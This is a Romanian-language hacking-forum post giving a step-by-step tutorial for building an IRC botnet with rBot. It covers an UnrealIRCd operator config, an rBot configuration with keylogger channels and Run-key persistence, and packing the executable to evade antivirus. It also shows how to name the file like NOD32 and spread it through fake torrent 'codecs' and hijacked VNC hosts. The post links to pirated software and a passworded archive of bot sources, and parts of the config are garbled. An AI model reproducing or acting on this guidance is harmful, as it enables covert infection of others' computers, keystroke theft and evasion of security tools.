Jump to content
Gonzalez

Cum sa: creezi Botnet

By Gonzalez, in Tutoriale in romana

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted

Cum sa creezi Botnet

Am scris la tutorialul asta 50 min, deci nu te astepta la mult :P

Ei, multi incepatori doresc sa stie ce e Botnet si cum functioneaza,am scris un tutorial scurt pentru incepatorii RST.

Iata si ce include :

1.De ce ai nevoie

2.Cum sa configurezi un (Ireal)ircd

3.Cum sa compilezi bot-ul

4.Fati exe-ul nedetectabil

5.Modalitati de al raspandi

1.De ce ai nevoie

Sunt multe lucruri care te pot ajuta sa creezi un botnet. Aici am o lista cu necesitatiile botnet-ului, voi explica de ce e nevoie de ele.

Visual Studio 6.0

http://rapidshare.com/files/18741766/Visual_Studio_6_Enterprice.Cruelintentionz.net.part01.rar.html
[url]http://rapidshare.com/files/18742747/Visual_Studio_6_Enterprice.Cruelintentionz.net.part02.rar.htm[/url] 
[url]http://rapidshare.com/files/18743650/Visual_Studio_6_Enterprice.Cruelintentionz.net.part03.rar.html[/url] 
[url]http://rapidshare.com/files/18744550/Visual_Studio_6_Enterprice.Cruelintentionz.net.part04.rar.html[/url] 
[url]http://rapidshare.com/files/18745513/Visual_Studio_6_Enterprice.Cruelintentionz.net.part05.rar.html[/url] 
[url]http://rapidshare.com/files/18746464/Visual_Studio_6_Enterprice.Cruelintentionz.net.part06.rar.html[/url] 
[url]http://rapidshare.com/files/18747289/Visual_Studio_6_Enterprice.Cruelintentionz.net.part07.rar.html[/url] 
[url]http://rapidshare.com/files/18748172/Visual_Studio_6_Enterprice.Cruelintentionz.net.part08.rar.html[/url] 
[url]http://rapidshare.com/files/18749110/Visual_Studio_6_Enterprice.Cruelintentionz.net.part09.rar.html[/url] 
[url]http://rapidshare.com/files/18749945/Visual_Studio_6_Enterprice.Cruelintentionz.net.part10.rar.html[/url] 
[url]http://rapidshare.com/files/18750837/Visual_Studio_6_Enterprice.Cruelintentionz.net.part11.rar.html[/url] 
[url]http://rapidshare.com/files/18740879/Visual_Studio_6_Enterprice.Cruelintentionz.net.part12.rar.html[/url]

Visual Studio 6.0 Service Pack 5 

http://download.microsoft.com/download/vstudio60ent/SP5/Wideband-Full/WIN98Me/EN-US/vs6sp5.exe

Visual Studio 6.0 Processor Pack

http://download.microsoft.com/download/vb60ent/update/6/w9x2kxp/en-us/vcpp5.exe

Core SDK

http://www.microsoft.com/msdownload/platformsdk/sdkupdate/psdk-full.htm

Daca habar nu ai cum sa le instalezi dai click aici :

http://www.ryan1918.com/viewtopic.php?t=1509

Windows root-at ( Si linuxul este folositor, dar aici vorbesc despre windwos )

Irc

Sursa bot-ului ( Eu am folosit rBot, gasesti botii in arhiva )

2.Cum sa configurezi un (Ireal)irc

Multe irc-uri sunt usor de configurat, in special cele cu mod. Deseori trebuie doar sa editezi numele, authost,irc port si admin user&password. Ce trebuie sa editam :

open username-ales { // Editeaza "username-ales" cu userul dorit
  from {
    userhost "numeletau@*"; // Editeaza "numeletau" cu adresa de e-mail
  };
  password "parola-ta-aleasa"; // Editeaza "parola-ta-aleasa" cu parola dorita
  class "default";
  flags { 
    netadmin;
    services-admin;
    global;
    helpop;
    can_rehash
    can_globalnotice;
    can_globalroute;
    can_globops;
    can_wallops;
    can_unkline;
    can_kline;
    can_globalkill;
    can_zline;
    can_gkline;
    can_gzline;
    get_umodew;
    get_host;
    can_override;
    can_die;
    can_restart;
  };
};

Editeaza flags de mai sus, daca doresti sa adaugi mai multi detinatori de irdc, copy & paste chestia

me  { name "QuakeNet"; info "QuakeNet"; numeric 1; };

Aici este numele serverului, numele poate fi "irc.QuakeNet.org", info este o informatie

  • listen *:6667;
    Cu usurinta editeaza port-ul, la un port deschis, multe porturi 6500 -> 7000 sunt deschise.

Cateva lucruri "extra" de editat

       hosts {
		local		"QuakeNet";
		global		"QuakeNet";
		coadmin		"QuakeNet";
		admin		"QuakeNet";
		servicesadmin 	"QuakeNet";
		netadmin 	"QuakeNet";
		host-on-open-up "yes";
	};
};

Sethost-urile [email]sub7@local.quakenet.org[/email] / [email]sub7@global.quakenet.org[/email].
Pune "no" in host-on-open-up ( In loc de "yes" ) daca nu doresti auto-host.

        restrict-channelmodes "ntsuom";
		modes-on-join "+Mustm";

Editeaza dupa preferintele tale,pentru a avea un canal securizat.

Acum, salveaza configuratia.Arhiveaza si upload-eaza pe un host. Urmatorul pas, este sa deschizi un windows (VNC???) downloadezi fisierele si le ascunzi intr-un folder ascuns, ca C:\Windows\System32\ce_vrei_tu. Apoi porneste exe-ul care iti permite deschiderea ircd-ului, sau fisierul batch se afla deseori acolo in irc mod, vei vedea irc ruland. Nu uita sa pui o parola la VNC,ca nimeni sa nu iti prinda user-ul si parola, securizeaza toate porturile ca botnet-ul sa nu fie "Sniffed" , mirosit:P

Urmeaza pasul 3.

3.Cum sa compilezi bot-ul

rBot-ul e cel mai simplu de folosit :P

Iata o configuratie, usoara :

// configuratie bot (generic) - nu trebuie sa fie criptata
int port = 6667;
int port2 = 6667;
int socks4port = 8001;
int tftpport = 69;
int httpport = 5465;
int rloginport = 514;
BOOL topiccmd = TRUE;
BOOL rndfilename = FALSE;
BOOL AutoStart = TRUE;
char prefix = '.';
int maxrand = 8;
int nicktype = CONSTNICK;
BOOL nickprefix = FALSE;

#ifdef DEBUG_LOGGING
char logfile[]="%temp%\\yas.jpg";
#endif

#ifndef NO_CRYPT

#else 
char botid[] = "rx-asn-2-re-worked";
char version[] = "v2 by ovelayer";
char password[] = "yourpass";
char server[] = "";
char serverpass[] = "";
char channel[] = "#";
char chanpass[] = "";rd
char server2[] = ""
char channel2[] = "#";
char chanpass2[] = "";
char filename[] = "yourfile.exe";
char keylogfile[] = "keylog.xml"l
char valuename[] = "";
char nickconst[] = "rBot|";
char szLocalPayloadFile[]="yourfile.exe";
char modeonconn[] = "-xi+B";
char exploitchan[] = "#*";
char keylogchan[] = "#*";
char psniffchan[] = "#*";

char *authost[] = {
	"yournick@172.0.0.1"
};

char *versionlist[] = {
	"mIRC v6.12 Khaled Mardam-Bey",
};

char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";
char regkey3[]="Software\\Microsoft\\OLE";
char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";

#endif

#ifdef PLAIN_CRYPT
char key[16] = "39lwmmqopma24ik1"; // Schimba ASTA! hmmm..Chiar am nevoie de aceasta ???

1. Schimba port-ul de la irc, normal este 6667, daca ai altul schimba.

2. Schimba prefix-ul, normal este ".", asta trebuie sa folosesti inaintea comandei, ca: ".login parola".

3. Parola, schimb-o pentru a te loga ".login parolanecunoscuta".

4. Server-ul, add IP/DNS.

5. Parola serverului, probabil nu ai una,dar daca ai schimb-o ( EDIT )

6. Canalul, editeaza canalul unde botii vor intra.

7. ChanPass, schimba sa fie mai sigur.

8. Nu adauga un al doilea server la rBot, deoarece nu va functiona.

9. Schimba "filename" pentru a nu fi detectat de vreun AV.

10.Fisierul in care PC-urile isi pun keylog-ul nu e necesar.

11.Value nume, deci daca exe-ul este numit nod32, atunci valuename = Nod32 AntiVirus sau asa ceva.

12.Nickconst este prefixul bot-ului, ca rBot|123456

13.Modul de conectare, lasa-l asa cum e.

14.Exploit channel, daca bot-ul se raspandeste va lasa un mesaj acolo.

15.Keylog si Psniff channel, va trimite mesaje pstore si keylog, dar PSNIFF nu functioneaza la rBot.

16.Autohost, poti seta autohostul ca sub7@*, asta va necesita sa ai nickname-ul ca toate hosturile, poti seta *@anonym0us.eu .

17.Lasa restul asa cum e.

4.Fati exe-ul nedetectabil

Inainte sa incepi cu totul trebuie sa faci exe-ul securizat, exista packer-e, este greu sa faci rost de un bun packer in acest moment, dar poti folosi pe cele publice, care face ca exe-ul sa fie detectat de nod32, kaspersky ( companiile mari de antivirusi ). Fisierul tau trebuie sa fie mic pentru a se raspandi, dar si nedetectabil, altfel un AV il va detecta...

5.Modalitati de al raspandi

Sunt multe cai de raspandire, ai nevoie de boti inainte de a incepe sa raspandesti exploituri via care sunt localizati in botii tai.Ex: il rogi pe un tip, sa downloadeze cu botii lui altii pe exe-ul tau, care iti permite sa pornesti un bnet, dar deasemenea ai nevoie de raspandire via torrent, doar creeaza un torrent cu film si exe-ul tau ( el fiind "codecul" sau ... ) sau scaneaza VNC-uri, infecteazale usor deschizand IE si exe ( STERGETI HISTORY ) :P

Download surse si IRC KITTS :

http://rapidshare.com/files/30408915/Botnet.rar.html

Password :

sub7@rstzone.net

Info :

http://en.wikipedia.org/wiki/Image:Zombie-process.png

Bafta!

-sub7

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...